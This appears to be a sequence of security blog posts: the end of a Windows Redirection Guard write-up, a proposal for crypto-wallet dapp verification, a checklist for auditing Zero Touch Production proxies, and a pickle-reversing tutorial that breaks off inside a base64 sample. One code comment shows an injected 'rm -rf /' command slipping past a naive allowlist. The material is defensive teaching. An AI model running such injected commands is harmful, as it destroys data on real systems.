// RAII wrapper so every opened HANDLE is closed automatically
using AutoHandle = std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)>;
using Proc = std::pair<std::wstring, AutoHandle>;

std::vector<Proc> getRunningProcesses() {
    std::vector<Proc> processes;

    AutoHandle snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle);

    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    if (!Process32First(snapshot.get(), &pe32)) {
        return processes;
    }

    do {
        // PROCESS_QUERY_INFORMATION is sufficient for GetProcessMitigationPolicy
        auto h = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
        if (h) {
            processes.emplace_back(std::wstring(pe32.szExeFile), AutoHandle(h, &CloseHandle));
        }
    } while (Process32Next(snapshot.get(), &pe32));

    return processes;
}

int main() {
    auto runningProcesses = getRunningProcesses();

    PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY policy = {};

    for (auto& process : runningProcesses) {
        auto result = GetProcessMitigationPolicy(process.second.get(), ProcessRedirectionTrustPolicy, &policy, sizeof(policy));

        // Report only the processes that audit or enforce the redirection trust policy
        if (result && (policy.AuditRedirectionTrust || policy.EnforceRedirectionTrust || policy.Flags)) {
            printf("%ws:\n", process.first.c_str());
            printf("\tAuditRedirectionTrust: %d\n\tEnforceRedirectionTrust: %d\n\tFlags: %d\n", policy.AuditRedirectionTrust, policy.EnforceRedirectionTrust, policy.Flags);
        }
    }
}

The Redirection Guard should prevent an entire class of junction attacks and might significantly complicate local privilege escalation attacks. While it addresses the previously mentioned issue, it also addresses other types of installer bugs, such as when a privileged installer moves files from user-controlled directories.

Microsoft Disclosure Timeline

Status                               Date
Vulnerability reported to Microsoft  9 Oct 2022
Vulnerability accepted               4 Nov 2022
Patch developed                      10 Jan 2023
Patch released                       14 Feb 2023

The Case For Improving Crypto Wallet Security

27 March 2023 at 22:00

Anatomy Of A Modern Day Crypto Scam

A large number of today’s crypto scams involve some sort of phishing attack, where the user is tricked into visiting a shady/malicious web site and connecting their wallet to it. The main goal is to trick the user into signing a transaction which will ultimately give the attacker control over the user’s tokens.

Usually, it all starts with a tweet or a post on some Telegram group or Slack channel, where a link is sent advertising either a new yield farming protocol boasting large APYs, or a new NFT project which just started minting. In order to interact with the web site, the user would need to connect their wallet and perform some confirmation or authorization steps.

Let’s take a look at the common NFT approve scam. The user is led to a malicious NFT site advertising a limited pre-mint of a new NFT collection. The user is then prompted to connect their wallet and sign a transaction confirming the mint. However, for some reason, the transaction fails. The same happens on the next attempt. With each failed attempt, the user grows more and more frustrated, believing the failures are causing them to miss out on the mint. Their focus gradually shifts from scrutinizing the transactions to the fear of missing out on a great opportunity.

At this point, the phishing is in full swing. A few more failed attempts, and the victim bites.

Wallet Phishing

(Image borrowed from How scammers manipulate Smart Contracts to steal and how to avoid it)

The final transaction, instead of calling the mint function, calls setApprovalForAll, which essentially gives the malicious actor control over the user’s tokens. By this point, the user is in a state where they blindly confirm transactions, hoping that the minting will not close.

Unfortunately, the last transaction is the one that goes through. Game over for the victim. All the attacker has to do now is act quickly and transfer the tokens away from the user’s wallet before the victim realizes what happened.

These types of attacks are really common today. A user stumbles on a link to a project offering new opportunities for profit, connects their wallet, and mistakenly hands over their tokens to malicious actors. While a case can be made for user education, responsibility, and researching a project before interacting with it, we believe that software also has a big part to play.

The Case For Improving Crypto Wallet Security

Nobody can deny that the introduction of blockchain-based technologies and Web3 has had a massive impact on the world. Most of these platforms offer the following common set of features:

  • transfer of funds
  • permission-less currency exchange
  • decentralized governance
  • digital collectibles

Regardless of the tech-stack used to build these platforms, it’s ultimately the users who make the platform. This means that users need a way to interact with their platform of choice. Today, the most user-friendly way of interacting with blockchain-based platforms is by using a crypto wallet. In simple terms, a crypto wallet is a piece of software which facilitates signing of blockchain transactions using the user’s private key. There are multiple types of wallets including software, hardware, custodial, and non-custodial. For the purposes of this post, we will focus on software based wallets.

Before continuing, let’s take a short detour to Web2. In that world, we can say that platforms (also called services, portals or servers) are primarily built using TCP/IP based technologies. In order for users to be able to interact with them, they use a user-agent, also known as a web browser. With that said, we can make the following parallel to Web3:

Technology  Communication Protocol  User-Agent
Web2        HTTP/TLS                Web Browser
Web3        Blockchain JSON RPC     Crypto Wallet

Web browsers are arguably much, much more complex pieces of software compared to crypto wallets - and with good reason. As the Internet developed, people figured out how to put different media on it and web pages allowed for dynamic and scriptable content. Over time, advancements in HTML and CSS technologies changed what and how content could be shown on a single page. The Internet became a place where people went to socialize, find entertainment, and make purchases. Browsers needed to evolve, to support new technological advancements, which in turn increased complexity. As with all software, complexity is the enemy, and complexity is where bugs and vulnerabilities are born. Browsers needed to implement controls to help mitigate web-based vulnerabilities such as spoofing, XSS, and DNS rebinding while still helping to facilitate secure communication via encrypted TLS connections.

Next, let’s see what a typical crypto wallet interaction might look like for a normal user.

The Current State Of Things In The Web3 World

Using a Web3 platform today usually means that a user is interacting with a web application (Dapp), which contains code to interact with the user’s wallet and smart contracts belonging to the platform. The steps in that communication flow generally look like:

1. Open the Dapp

In most cases, the user will navigate their web browser to a URL where the Dapp is hosted (ex. Uniswap). This will load the web page containing the Dapp’s code. Once loaded, the Dapp will try to connect to the user’s wallet.

Dapp and User Wallet

2. Authorizing The Dapp

Crypto wallets implement a few protections, such as requiring the user’s authorization before a Dapp can access their accounts, and requiring transactions to be explicitly signed. This was not the case before EIP-1102. Implementing these features helped keep users anonymous, stop Dapp spam, and provide a way for the user to manage trusted and un-trusted Dapp domains.

Authorizing The Dapp 1

If all the previous steps were completed successfully, the user can start using the Dapp.

When the user decides to perform an action (make a transaction, buy an NFT, stake their tokens, etc.), the user’s wallet will display a popup, asking whether the user confirms the action. The transaction parameters are generated by the Dapp and forwarded to the wallet. If confirmed, the transaction will be signed and published to the blockchain, awaiting confirmation.

Authorizing The Dapp 2

Besides the authorization popup when initially connecting to the Dapp, the user is not shown much additional information about the application or the platform. This ultimately burdens the user with verifying the legitimacy and trustworthiness of the Dapp and, unfortunately, this requires some degree of technical knowledge often out-of-reach for the majority of common users. While doing your own research, a common mantra of the Web3 world, is recommended, one misstep can lead to significant loss of funds.

That being said, let’s now take another detour to the Web2 world and see what a similar interaction looks like.

How Does The Web2 World Handle Similar Situations?

As in the previous example, we’ll look at what happens when a user wants to use a Web2 application. Let’s say the user wants to check their email inbox. They’ll start by navigating their browser to the email domain (ex. Gmail). In the background, the browser performs a TLS handshake, trying to establish a secure connection to Gmail’s servers. This enables an encrypted channel between the user’s browser and Gmail’s servers, preventing eavesdropping. If the handshake is successful, an encrypted connection is established and communicated to the user through the browser’s UI.

Browser Lock

The secure connection is based on certificates issued for the domain the user is trying to access. A certificate contains a public key used to establish the encrypted connection. Additionally, certificates must be signed by a trusted third-party called a Certificate Authority (CA), giving the issued certificate legitimacy and guaranteeing that it belongs to the domain being accessed.
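To make this concrete, here is a minimal Python sketch (the hostname is just an example) that retrieves the same certificate fields a browser validates before showing the lock icon:

import socket
import ssl

# Uses the system's trusted CA store, like a browser would
ctx = ssl.create_default_context()

with socket.create_connection(("gmail.com", 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname="gmail.com") as tls:
        cert = tls.getpeercert()  # parsed certificate of the peer
        print(cert["subject"])
        print(cert["notBefore"], "->", cert["notAfter"])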

But, what happens if that is not the case? What happens when the certificate is for some reason rejected by the browser? Well, in that case a massive red warning is shown, explaining what happened to the user.

Browser Certificate Error

Such warnings are shown when a secure connection cannot be established, when the certificate of the host is not trusted, or when the certificate has expired. The browser also tries to show, in a human-readable manner, as much useful information about the error as possible. At this point, it’s the choice of the user whether they trust the site and want to continue interacting with it. The task of the browser is to inform the user of potential issues.

What Can Be Done?

Crypto wallets should show the user as much information about the action being performed as possible. The user should see information about the domain/Dapp they are interacting with. Details about the actual transaction’s content, such as what function is being invoked and its parameters should be displayed in a user-readable fashion.

Comparing the two examples, we can notice a lack of verification and information displayed in crypto wallets today. This then poses the question: what can be done? A number of publicly available indicators exist for the health and legitimacy of a project. We believe communicating these to the user would be a good step forward in addressing this issue. Let’s quickly go through them.

Proof Of Smart Contract Ownership

It is important to prove that a domain has ownership over the smart contracts with which it interacts. Currently, this mechanism doesn’t seem to exist. However, we think we have a good solution. Similarly to how Apple performs merchant domain verification, a simple JSON file or dapp_file can be used to verify ownership. The file can be stored on the root of the Dapp’s domain, on the path .well-known/dapp_file. The JSON file can contain the following information:

  • address of the smart contract the Dapp is interacting with
  • timestamp showing when the file was generated
  • signature of the content, verifying the validity of the file
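Putting those fields together, a hypothetical dapp_file could look like this (the field names are illustrative, not a finalized format):

{
  "contract_address": "0xF4134146AF2d511Dd5EA8cDB1C4AC88C57D60404",
  "timestamp": "2023-01-01T00:00:00Z",
  "signature": "0x..."
}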

At this point, a reader might say: “How does this show ownership of the contract?”. The key to that is the signature. Namely, the signature is generated by using the private key of the account which deployed the contract. The transparency of the blockchain can be used to get the deployer address, which can then be used to verify the signature (similarly to how Ethereum smart contracts verify signatures on-chain).
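As a rough sketch of that off-chain check, assuming the file is signed with an Ethereum personal_sign-style signature (the helper below is hypothetical and not part of any existing service):

from eth_account import Account
from eth_account.messages import encode_defunct

def verify_dapp_file(content: bytes, signature: str, deployer: str) -> bool:
    # Recover the address that signed the raw file bytes...
    message = encode_defunct(content)
    signer = Account.recover_message(message, signature=signature)
    # ...and require it to match the contract deployer's address
    return signer.lower() == deployer.lower()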

This mechanism enables creating an explicit association between a smart contract and the Dapp. The association can later be used to perform additional verification.

Domain Registration Records

When a new domain is purchased or registered, a public record is created with a public registrar, indicating that the domain is owned by someone and is no longer available for purchase. The domain name is used by the Domain Name System, or DNS, which translates it (ex. www.doyensec.com) to a machine-friendly IP address (ex. 34.210.62.107).

The creation date of a DNS record shows when the Dapp’s domain was initially purchased. So, if a user is trying to interact with an already long established project and runs into a domain which claims to be that project with a recently created domain registration record, it may be a signal of possible fraudulent activities.

TLS Certificates

Creation and expiration dates of TLS certificates can be viewed in a similar fashion as DNS records. However, due to the short duration of certificates issued by services such as Let’s Encrypt, there is a strong chance that visitors of the Dapp will be shown a relatively new certificate.

TLS certificates, however, can be viewed as a way of verifying a correct web site setup where the owner took additional steps to allow secure communication between the user and their application.

Smart Contract Source Code Verification Status

Published and verified source code allows for audits of the smart contract’s functionality and can allow quick identification of malicious activity.

Smart Contract Deployment Date

The smart contract’s deployment date can provide additional information about the project. For example, if attackers set up a fake Uniswap web site, the likelihood of the malicious smart contract being recently deployed is high. If interacting with an already established, legitimate project, such a discrepancy should alarm the user of potential malicious activity.

Smart Contract Interactions

Trustworthiness of a project can be seen as a function of the number of interactions with that project’s smart contracts. A healthy project with a large user base will likely have a large number of unique interactions with the project’s contracts. A small number of interactions, unique or not, suggests the opposite. While typical of a new project, it can also be an indicator of smart contracts set up to impersonate a legitimate project. Such smart contracts will not have the large user base of the original project, so the number of interactions with the project will be low.

Overall, a large number of unique interactions over a long period of time with a smart contract may be a powerful indicator of a project’s health and the health of its ecosystem.
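As a hedged sketch, a first approximation of this metric can be computed with Etherscan’s public transaction list API (error handling, pagination, and rate limits are omitted):

import requests

def unique_senders(address: str, api_key: str) -> int:
    resp = requests.get(
        "https://api.etherscan.io/api",
        params={
            "module": "account",
            "action": "txlist",
            "address": address,
            "apikey": api_key,
        },
        timeout=10,
    )
    txs = resp.json().get("result", [])
    # Each distinct "from" address is one unique account interacting on-chain
    return len({tx["from"] for tx in txs})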

Our Suggestion

While there are authorization steps implemented when a wallet is connecting to an unknown domain, we think there is space for improvement. The connection and transaction signing process can be further updated to show user-readable information about the domain/Dapp being accessed.

As a proof-of-concept, we implemented a simple web service https://github.com/doyensec/wallet-info. The service utilizes public information, such as domain registration records, TLS certificate information and data available via Etherscan’s API. The data is retrieved, validated, parsed and returned to the caller.

The service provides access to the following endpoints:

  • /host?url=<url>
  • /contract?address=<address>

The data these endpoints return can be integrated in crypto wallets at two points in the user’s interaction.

Initial Dapp Access

The /host endpoint can be used when the user is initially connecting to a Dapp. The Dapp’s URL should be passed as a parameter to the endpoint. The service will use the supplied URL to gather information about the web site and its configuration. Additionally, the service will check for the presence of the dapp_file on the site’s root and verify its signature. Once processing is finished, the service will respond with:

{
  "name": "Example Dapp",
  "timestamp": "2000-01-01T00:00:00Z",
  "domain": "app.example.com",
  "tls": true,
  "tls_issued_on": "2022-01-01T00:00:00Z",
  "tls_expires_on": "2022-01-01TT00:00:00Z",
  "dns_record_created": "2012-01-01T00:00:00Z",
  "dns_record_updated": "2022-08-14T00:01:31Z",
  "dns_record_expires": "2023-08-13T00:00:00Z",
  "dapp_file": true,
  "valid_signature": true
}

This information can be shown to the user in a dialog UI element, such as:

Wallet Dialog Safe

As a concrete example, let’s take a look at a fake Uniswap site that was active during the writing of this post. If a user tried to connect their wallet to the Dapp running on the site, the following information would be returned to the user:

{
  "name": null,
  "timestamp": null,
  "domain": "apply-uniswap.com",
  "tls": true,
  "tls_issued_on": "2023-02-06T22:37:19Z",
  "tls_expires_on": "2023-05-07T22:37:18Z",
  "dns_record_created": "2023-02-06T23:31:09Z",
  "dns_record_updated": "2023-02-06T23:31:10Z",
  "dns_record_expires": "2024-02-06T23:31:09Z",
  "dapp_file": false,
  "valid_signature": false
}

The missing information in the response reflects the fact that the dapp_file was not found on this domain. This is then reflected in the UI, informing the user of potential issues with the Dapp:

Wallet Dialog Domain Unsafe

At this point, the user can review the information and decide whether they feel comfortable giving the Dapp access to their wallet. Once the Dapp is authorized, this information doesn’t need to be shown anymore, though it would be beneficial to occasionally re-display it, so that any changes in the Dapp or its domain are communicated to the user.

Making A Transaction

Transactions can be split in two groups: transactions that transfer native tokens and transactions which are smart contract function calls. Based on the type of transaction being performed, the /contract endpoint can be used to retrieve information about the recipient of the transferred assets.

For our case, the smart contract function calls are the more interesting group of transactions. The wallet can retrieve information about both the smart contract on which the function will be called and the function parameter representing the recipient; for example, the spender parameter in the approve(address spender, uint256 amount) function call. This information can be retrieved on a case-by-case basis, depending on the function call being performed.

Signatures of widely used functions are available and can be implemented in the wallet as a type of an allow or safe list. If a signature is unknown, the user should be informed about it.
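A minimal sketch of such an allowlist, assuming the wallet matches the first four bytes of calldata (the function selector) against known signatures:

from eth_utils import function_signature_to_4byte_selector

KNOWN_FUNCTIONS = [
    "approve(address,uint256)",
    "setApprovalForAll(address,bool)",
    "transfer(address,uint256)",
]

# Map each 4-byte selector to its human-readable signature
SELECTORS = {function_signature_to_4byte_selector(sig): sig for sig in KNOWN_FUNCTIONS}

def label_calldata(calldata: bytes) -> str:
    # The first 4 bytes of calldata select the contract function
    return SELECTORS.get(calldata[:4], "unknown function - warn the user")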

Verifying the recipient gives users confidence they are transferring tokens, or allowing access to their tokens for known, legitimate addresses.

An example response for a given address will look something like:

{
  "is_contract": true,
  "contract_address": "0xF4134146AF2d511Dd5EA8cDB1C4AC88C57D60404",
  "contract_deployer": "0x002362c343061fef2b99d1a8f7c6aeafe54061af",
  "contract_deployed_on": "2023-01-01T00:00:00Z",
  "contract_tx_count": 10,
  "contract_unique_tx": 5,
  "valid_signature": true,
  "verified_source": false
}

In the background, the web service will gather information about the type of address (EOA or smart contract), code verification status, address interaction information etc. All of that should be shown to the user as part of the transaction confirmation step.

Wallet Dialog  Unsafe

Links to the smart contract and any additional information can be provided here, helping users perform additional verification if they so wish.

In the case of native token transfers, the majority of verification consists of typing in the valid to address. This is not a task that is well suited for automatic verification. For this use case, wallets provide an “address book” like functionality, which should be utilized to minimize any user errors when initializing a transaction.

Conclusion

The point of this post is to highlight the shortcomings of today’s crypto wallet implementations, to present ideas, and make suggestions for how they can be improved. This field is actively being worked on. Recently, MetaMask updated their confirmation UI to display additional information, informing users of potential setApprovalForAll scams. This is a step in the right direction, but there is still a long way to go. Features like these can be built upon and augmented, to a point where users can make transactions and know, to a high level of certainty, that they are not making a mistake or being scammed.

There are also third-party groups like WalletGuard and ZenGo that have implemented verifications similar to those described in this post. These features should be standard and required for every crypto wallet, not an additional piece of software that needs to be installed.

Like the user-agent of Web2, the web browser, user-agents of Web3 should do as much as possible to inform and protect their users.

Our implementation of the wallet-info web service is just an example of how public information can be pooled together. That information, combined with a good UI/UX design, will greatly improve the security of crypto wallets and, in turn, the security of the entire Web3 ecosystem.

Does Dapp verification completely solve the phishing/scam problem? Unfortunately, the answer is no. The proposed changes can help users in distinguishing between legitimate projects and potential scams, and guide them to make the right decision. Dedicated attackers, given enough time and funds, will always be able to produce a smart contract, Dapp or web site, which will look harmless using the indicators described above. This is true for both the Web2 and Web3 world.

Ultimately, it is up to the user to decide whether they feel comfortable giving their login credentials to a web site, or access to their crypto wallet to a Dapp. All software can do is point them in the right direction.

Testing Zero Touch Production Platforms and Safe Proxies

3 May 2023 at 22:00

As more companies develop in-house services and tools to moderate access to production environments, the importance of understanding and testing these Zero Touch Production (ZTP) platforms grows [1] [2]. This blog post aims to provide an overview of ZTP tools and services, explore their security role in DevSecOps, and outline common pitfalls to watch out for when testing them.

SRE? ZTP?

“Every change in production must be either made by automation, prevalidated by software or made via audited break-glass mechanism.” – Seth Hettich, Former Production TL, Google

This terminology was popularized by Google’s DevOps teams and remains the gold standard to this day. In this picture, SREs are a select group of engineers who can exclusively use their SSH production access to act when something breaks. But that access introduces reliability and security risks if they make a mistake or their accounts are compromised. To balance this risk, companies should automate the majority of production operations while providing routes for manual changes when necessary. This is the basic reasoning behind the “Zero Touch Production” pattern.

The way we all feel about SRE

Safe Proxies In Production

The “Safe Proxy” model refers to the tools that allow authorized persons to access or modify the state of physical servers, virtual machines, or particular applications. From the original definition:

At Google, we enforce this behavior by restricting the target system to accept only calls from the proxy through a configuration. This configuration specifies which application-layer remote procedure calls (RPCs) can be executed by which client roles through access control lists (ACLs). After checking the access permissions, the proxy sends the request to be executed via the RPC to the target systems. Typically, each target system has an application-layer program that receives the request and executes it directly on the system. The proxy logs all requests and commands issued by the systems it interacts with.

The safety & security roles of Safe Proxies

There are various outage scenarios prevented by ZTP (e.g., typos, cut/paste errors, wrong terminals, underestimating the blast radius of impacted machines, etc.). On paper, it’s a great way to protect production availability from human error, but it can also help prevent some forms of malicious access. A typical scenario involves an SRE who is compromised or malicious and tries to do what an attacker would do with those privileges. This could include bringing down or attacking other machines, compromising secrets, or scraping user data programmatically. This is why testing these services will become more and more important, as attackers will find them valuable and target them.

Generic scheme about Safe Proxies

What does ZTP look like today

Many companies nowadays need these safe proxy tools to realize their vision, but they are all trying to reinvent the wheel in one way or another, because this is an immature market with no off-the-shelf solutions. During development, the security team is often included in the steering committee, but may lack the domain-specific knowledge needed to build similar solutions. Another issue is that, since the main driver is usually the DevOps team wanting operational safety, availability and integrity are prioritized at the expense of confidentiality. In reality, the ZTP framework development team should collaborate with SRE and security teams throughout the design and implementation phases, ensuring that security and reliability best practices are woven into the fabric of the framework and not just bolted on at the end.

Last but not least, these solutions still suffer from low adoption rates and are subject to lax interpretations (to the point where developers are the ones using these systems to access what they’re allowed to touch in production). These services are particularly juicy for both pentesters and attackers. It’s no exaggeration to say that every actor compromising a box in a corporate environment should first look at these services to escalate their access.

What to look for when auditing ZTP tools/services

We compiled some of the most common issues we’ve encountered while testing ZTP implementations below:

A. Web Attack Surface

ZTP services often expose a web-based frontend for various purposes such as monitoring, proposing commands or jobs, and checking command output. These frontends are prime targets for classic web security vulnerabilities like Cross-Site Request Forgery (CSRF), Server-Side Request Forgery (SSRF), Insecure Direct Object References (IDORs), XML External Entity (XXE) attacks, and Cross-Origin Resource Sharing (CORS) misconfigurations. If the frontend is also used for command moderation, it presents an even more interesting attack surface.

B. Hooks

Webhooks are widely used in ZTP platforms due to their interaction with team members and on-call engineers. These hooks are crucial for the command approval flow ceremony and for monitoring. Attackers may try to manipulate or suppress any PagerDuty, Slack, or Microsoft Teams bot/hook notifications. Issues to look for include content spoofing, webhook authentication weaknesses, and replay attacks.

C. Safe Centralization

Safety checks in ZTP platforms are usually evaluated centrally. A portion of the solution is often hosted independently for availability, to evaluate the rules set by the SRE team. It’s essential to assess the security of the core service, as exploiting or polluting its visibility can affect the entire infrastructure’s availability (what if the service is down? who can access this service?).

In a hypothetical attack scenario, if a rule is set to only allow reboots of a certain percentage of the fleet, can an attacker pollute the fleet status and make dead hosts look alive? This can be achieved with ping reply spoofing, or via MITM in the case of plain HTTP health endpoints. Under these premises, network communications must be Zero Trust too, to defend against this.

D. Insecure Default Templates

The templates for the policy configuration managing the access control for services are usually provided to service owners. These can be a source of errors themselves. Users should be guided to make the right choices by providing templates or automatically generating settings that are secure by default. For a full list of the design strategies presented, see the “Building Secure and Reliable Systems” bible [3].

E. Logging

Inconsistent or excessive logging retention of command outputs can be hazardous. Attackers might abuse discrepancies in logging retention to access user data or secrets logged in a given command or its results.

F. Rate-limiting

Proper rate-limiting configuration is essential to ensure an attacker cannot change all production “at once” by themselves. The rate limiting configuration should be agreed upon with the team responsible for the mediated services.

G. ACL Ownership

Another pitfall is found in what provides the ownership or permission logic for the services. If SREs can edit membership data via the same ZTP service or via other means, an attacker can do the same and bypass the solution entirely.

ZTP

H. Command Safeguards

Strict allowlists of parameters and configurations should be defined for commands or jobs that can be run. Similar to “living off the land binaries” (lolbins), if arguments to these commands are not properly vetted, there’s an increased risk of abuse.

I. Traceability and Scoping

A reason for the pushed command must always be requested by the user (who, when, what, WHY). Ensuring traceability and scoping in the ZTP platform helps maintain a clear understanding of actions taken and their justifications.

J. Scoped Access

The ZTP platform should have rules in place to detect not only if the user is authorized to access user data, but also which kind and at what scale. Lack of fine-grained authorization or scoping rules for querying user data increases the risk of abuse.

K. Different Interfaces, Different Requirements

ZTP platforms usually have two types of proxy interfaces: Remote Procedure Call (RPC) and Command Line Interface (CLI). The RPC proxy is used to run CLI on behalf of the user/service in production in a controlled way. Since the implementation varies between the two interfaces, looking for discrepancies in the access requirements or logic is crucial.

L. Service vs Global rules

The rule evaluation priority (Global over Service-specific) is another area of concern. In general, service rules should not be able to override global rules but only set stricter requirements.

M. Command Parsing

If an allowlist is enforced, inspect how the command is parsed when the allowlist is evaluated (abstract syntax tree (AST), regex, binary match, etc.).
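To illustrate why the parsing strategy matters, consider this Python sketch (the systemctl allowlist is hypothetical) contrasting a naive regex prefix match with token-level validation:

import re
import shlex

NAIVE_ALLOW = re.compile(r"^systemctl restart ")
SAFE_UNITS = {"nginx.service", "redis.service"}

def naive_check(cmd: str) -> bool:
    # Accepts "systemctl restart nginx.service; rm -rf /" - the prefix matches
    return bool(NAIVE_ALLOW.match(cmd))

def strict_check(cmd: str) -> bool:
    # Tokenize like a shell would, then validate every argument explicitly
    tokens = shlex.split(cmd)
    return (
        len(tokens) == 3
        and tokens[:2] == ["systemctl", "restart"]
        and tokens[2] in SAFE_UNITS
    )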

N. Race Conditions

All operations should be queued, and a global queue for the commands should be respected. There should be no chance of race conditions if two concurrent operations are issued.

O. Break-glass

In the ZTP pattern, a break-glass mechanism is always available for emergency response. Auditing this mode is essential: entering it must be loud, justified, alert security, and be heavily logged. As an additional security measure, the break-glass mechanism for zero trust networking should be available only from specific locations. These locations are the organization’s panic rooms: specific locations with additional physical access controls to offset the increased trust placed in their connectivity.

Conclusions

As more companies develop and adopt Zero Touch Production platforms, it is crucial to understand and test these services for security vulnerabilities. With an increase in vendors and solutions for Zero Touch Production in the coming years, researching and staying informed about these platforms’ security issues is an excellent opportunity for security professionals.

References

  1. Michał Czapiński and Rainer Wolafka from Google Switzerland, “Zero Touch Prod: Towards Safer and More Secure Production Environments”. USENIX (2019). Link / Talk 

  2. Ward, Rory, and Betsy Beyer. “Beyondcorp: A new approach to enterprise security”, (2014). Link 

  3. Adkins, Heather, et al. “Building secure and reliable systems: best practices for designing, implementing, and maintaining systems”. O’Reilly Media, (2020). Link 

Reversing Pickles with r2pickledec

31 May 2023 at 22:00

R2pickledec is the first pickle decompiler to support all instructions up to protocol 5 (the current version). In this post, we will go over what Python pickles are, how they work, and how to reverse them with Radare2 and r2pickledec. An upcoming blog post will go even deeper into pickles and share some advanced obfuscation techniques.

What are pickles?

Pickles are the built-in serialization algorithm in Python. They can turn any Python object into a byte stream so it may be stored on disk or sent over a network. Pickles are notoriously dangerous. You should never unpickle data from an untrusted source. Doing so will likely result in remote code execution. Please refer to the documentation for more details.

Pickle Basics

Pickles are implemented as a very simple assembly language. There are only 68 instructions and they mostly operate on a stack. The instruction names are pretty easy to understand. For example, the instruction empty_dict will push an empty dictionary onto the stack.

The stack only allows access to the top item, or the top few items in some cases. If you want to grab something else, you must use the memo. The memo is implemented as a dictionary with positive integer indexes, and you will often see memoize instructions. Naively, the memoize instruction copies the item at the top of the stack into the next index in the memo. Then, if that item is needed later, a binget n can be used to get the object at index n.

To learn more, I recommend playing with some pickles yourself. Enable descriptions in Radare2 with e asm.describe = true to get short descriptions of each instruction. Decompile simple pickles that you build yourself, and see if you can understand the instructions.
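For example, you can build a toy pickle and inspect its instructions with nothing but the standard library:

import pickle
import pickletools

# Serialize a tiny object; protocol 4 uses framing and memoize opcodes
payload = pickle.dumps({"user": "admin"}, protocol=4)

# Prints one opcode per line: expect FRAME, EMPTY_DICT, MEMOIZE,
# SHORT_BINUNICODE, SETITEM and STOP for this input
pickletools.dis(payload)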

Installing Radare2 and r2pickledec

For reversing pickles, our tool of choice is Radare2 (r2 for short). Package managers tend to ship really old r2 versions. In this case, that’s probably fine; I added the pickle arch to r2 a long time ago. But if you run into any bugs, I suggest installing from source.

In this blog post, we will primarily be using our R2pickledec decompiler plugin. I purposely wrote this plugin to rely only on r2 libraries, so if r2 works on your system, r2pickledec should work too. You should be able to install it with r2pm.

$ r2pm -U             # update package db
$ r2pm -ci pickledec  # clean install

You can verify everything worked with the following command. You should see the r2pickledec help menu.

$ r2 -a pickle -qqc 'pdP?' -
Usage: pdP[j]  Decompile python pickle
| pdP   Decompile python pickle until STOP, eof or bad opcode
| pdPj  JSON output
| pdPf  Decompile and set pick.* flags from decompiled var names

Reversing a Real pickle with Radare2 and r2pickledec

Let’s reverse a real pickle. One never reverses without some context, so let’s imagine you just broke into a webserver. The webserver allows employees of the company to perform privileged actions on client accounts. While poking around, you find a pickle file that the server uses to restore its state. What interesting things might we find in the pickle?

The pickle appears below base64 encoded. Feel free to grab it and play along at home.

$ base64 -i /tmp/blog2.pickle -b 64
gASVDQYAAAAAAACMCF9fbWFpbl9flIwDQXBplJOUKYGUfZQojAdzZXNzaW9ulIwR
cmVxdWVzdHMuc2Vzc2lvbnOUjAdTZXNzaW9ulJOUKYGUfZQojAdoZWFkZXJzlIwT
cmVxdWVzdHMuc3RydWN0dXJlc5SME0Nhc2VJbnNlbnNpdGl2ZURpY3SUk5QpgZR9
lIwGX3N0b3JllIwLY29sbGVjdGlvbnOUjAtPcmRlcmVkRGljdJSTlClSlCiMCnVz
ZXItYWdlbnSUjApVc2VyLUFnZW50lIwWcHl0aG9uLXJlcXVlc3RzLzIuMjguMpSG
lIwPYWNjZXB0LWVuY29kaW5nlIwPQWNjZXB0LUVuY29kaW5nlIwNZ3ppcCwgZGVm
bGF0ZZSGlIwGYWNjZXB0lIwGQWNjZXB0lIwDKi8qlIaUjApjb25uZWN0aW9ulIwK
Q29ubmVjdGlvbpSMCmtlZXAtYWxpdmWUhpR1c2KMB2Nvb2tpZXOUjBByZXF1ZXN0
cy5jb29raWVzlIwRUmVxdWVzdHNDb29raWVKYXKUk5QpgZR9lCiMB19wb2xpY3mU
jA5odHRwLmNvb2tpZWphcpSME0RlZmF1bHRDb29raWVQb2xpY3mUk5QpgZR9lCiM
CG5ldHNjYXBllIiMB3JmYzI5NjWUiYwTcmZjMjEwOV9hc19uZXRzY2FwZZROjAxo
aWRlX2Nvb2tpZTKUiYwNc3RyaWN0X2RvbWFpbpSJjBtzdHJpY3RfcmZjMjk2NV91
bnZlcmlmaWFibGWUiIwWc3RyaWN0X25zX3VudmVyaWZpYWJsZZSJjBBzdHJpY3Rf
bnNfZG9tYWlulEsAjBxzdHJpY3RfbnNfc2V0X2luaXRpYWxfZG9sbGFylImMEnN0
cmljdF9uc19zZXRfcGF0aJSJjBBzZWN1cmVfcHJvdG9jb2xzlIwFaHR0cHOUjAN3
c3OUhpSMEF9ibG9ja2VkX2RvbWFpbnOUKYwQX2FsbG93ZWRfZG9tYWluc5ROdWKM
CF9jb29raWVzlH2UdWKMBGF1dGiUjAVhZG1pbpSMD1BpY2tsZXMgYXJlIGZ1bpSG
lIwHcHJveGllc5R9lIwFaG9va3OUfZSMCHJlc3BvbnNllF2Uc4wGcGFyYW1zlH2U
jAZ2ZXJpZnmUiIwEY2VydJROjAhhZGFwdGVyc5RoFClSlCiMCGh0dHBzOi8vlIwR
cmVxdWVzdHMuYWRhcHRlcnOUjAtIVFRQQWRhcHRlcpSTlCmBlH2UKIwLbWF4X3Jl
dHJpZXOUjBJ1cmxsaWIzLnV0aWwucmV0cnmUjAVSZXRyeZSTlCmBlH2UKIwFdG90
YWyUSwCMB2Nvbm5lY3SUTowEcmVhZJSJjAZzdGF0dXOUTowFb3RoZXKUTowIcmVk
aXJlY3SUTowQc3RhdHVzX2ZvcmNlbGlzdJSPlIwPYWxsb3dlZF9tZXRob2RzlCiM
BVRSQUNFlIwGREVMRVRFlIwDUFVUlIwDR0VUlIwESEVBRJSMB09QVElPTlOUkZSM
DmJhY2tvZmZfZmFjdG9ylEsAjBFyYWlzZV9vbl9yZWRpcmVjdJSIjA9yYWlzZV9v
bl9zdGF0dXOUiIwHaGlzdG9yeZQpjBpyZXNwZWN0X3JldHJ5X2FmdGVyX2hlYWRl
cpSIjBpyZW1vdmVfaGVhZGVyc19vbl9yZWRpcmVjdJQojA1hdXRob3JpemF0aW9u
